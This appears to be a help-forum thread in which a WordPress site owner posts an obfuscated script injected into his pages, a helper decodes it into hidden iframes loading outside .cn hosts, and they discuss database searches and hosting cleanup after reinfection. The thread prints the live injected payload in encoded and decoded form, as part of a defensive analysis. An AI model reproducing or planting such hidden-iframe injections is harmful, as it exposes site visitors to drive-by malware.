That looks like the beginning of a highly obfuscated script, which writes the beginning of an HTML tag. If you paste the whole thing in here, I can de-obfuscate it for you and tell you what it does.

This is the full code:

<
<!--
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%65%39%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%66%69%72%73%74%62%6c%75%2e%63%6e%2f%33%2e%70%68%70%3f%36%39%30%35%38%35%30%31%27%20%77%69%64%74%68%3d%39%38%20%68%65%69%67%68%74%3d%31%34%31%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
//-->

I just removed the script tags for saftey (if it matters)?

Thanks for the help.

Matt

You're being hacked.
That code is inserting this element onto your page:

<IFRAME name=ee9 src='http://firstblu.cn/3.php?69058501' width=98 height=141 style='display: none'></IFRAME>

Inside that iframe, it's loading "http://firstblu.cn/3.php?69058501". Request that URL, and you get this:

<iframe src="&#104&#116&#116&#112&#58&#47&#47&#102&#105&#114&#115&#116&#115&#108&#97&#115&#104&#46&#99&#110&#47&#112&#97&#114&#107&#47" width=1 height=1 style="visibility: hidden"></iframe>

Oddly, this does nothing, because HTML entities don't resolve in a URL, and anyways the hacker didn't put semicolons after the HTML entity names. Instead of "&#104", they probably intended to write "&#104;"

So at this point, out of curiosity we delve in to figure out what the hacker probably intended... When I add the missing semicolons, it produces this string:

[firstslash.cn...]

So - at the bottom of all this unsuccessful obfuscation, the hacker wanted an iframe to open with that Chinese URL in it. When I request that url, I get an empty page. The trail ends.

I think this may be an expired attempt that was abandoned by the hacker, and now does nothing. The code is still being written on your page, but the resources it used to access are no longer working properly.

Look for any of those URLs and strings in your database, files, etc. Rule out your own system as the cause of the script injection. Then call your ISP, and request that their machines be cleaned, reinstalled, formatted, rebooted. Or switch to a new hosting provider.

I hope this helped!

Thanks for unraveling that. The only thing I can think is that it must be in the mysql database, because everything else was completely removed and restarted at a new host with all new files downloaded directly from wordpress and using their default theme. So, if I search the database, I want to look for a string like: firstblu.cn and that should point out where the whole piece of code is hiding? Or do I search for it in obfuscated format?

Thanks again for your help. This has been no end of aggravating...

Matt

It could be in your database. How large is your database (ie how many posts+comments)? Dozens, hundreds, or thousands? I mean, is it reasonable to pore through it manually a row at a time?

Try some wild searches, like:
SELECT * FROM wp_comments WHERE comment_content LIKE '%script%'
SELECT * FROM wp_comments WHERE comment_content LIKE '%first%'

But something is fishy. You say this is showing on all your index pages, including the ADMIN index? The wp-admin folder? That's suspicious. Why would someone's user-entered data show up in the WP admin area?

This makes me wish there was a SQL statement akin to "SEARCH":
SEARCH wp_comments,wp_links,wp_posts FOR '%script%'
But alas, such a thing doesn't exist AFAIK

Hi,

I don't know why the script attaches itself to every index page- that goes beyond my level of understanding of this stuff. I can also tell you that in some cases, there will be two insertions, and back when I had two wordpress blogs installed at the same host- one main domain and one add on, it traveled to both, even though they had different databases.

The only reason I think it must be in the database is because that is the only thing that didn't change- I have about 500 entries between posts/comments, and I didn't want to start from scratch. But, I changed hosts, passwords, and used a completely new wordpress download to install, and I didn't even change from the default theme, as I've read some themes can be compromised. Despite this, I had a new script insertion within 24 hours.

I will try again to look in the database, but here also my skill is pretty limited. I agree- a search function would be great, particularly for someone like me who isn't too tech savvy with this stuff.

Matt

Are you the only one that sees this on the pages? It's possible that it is you that has the problem, and not the site.

I've seen it on about a dozen different computers, because during some of the time I've been dealing with it I was traveling and checking from internet cafes, libraries, etc. So I am certain it is something on the hosting side.

Matt

I just tried an experiment with this- I created a new blog installation, with no entries, as an addon to the hosting account (technically I think it is a subdomain with a redirect) with a different password and database and sure enough, within a few hours, the index page had an iframe inserted on the new blog. So I scoured the database, and there was nothing there I could find that shouldn't have been. So, now I am just totally stumped...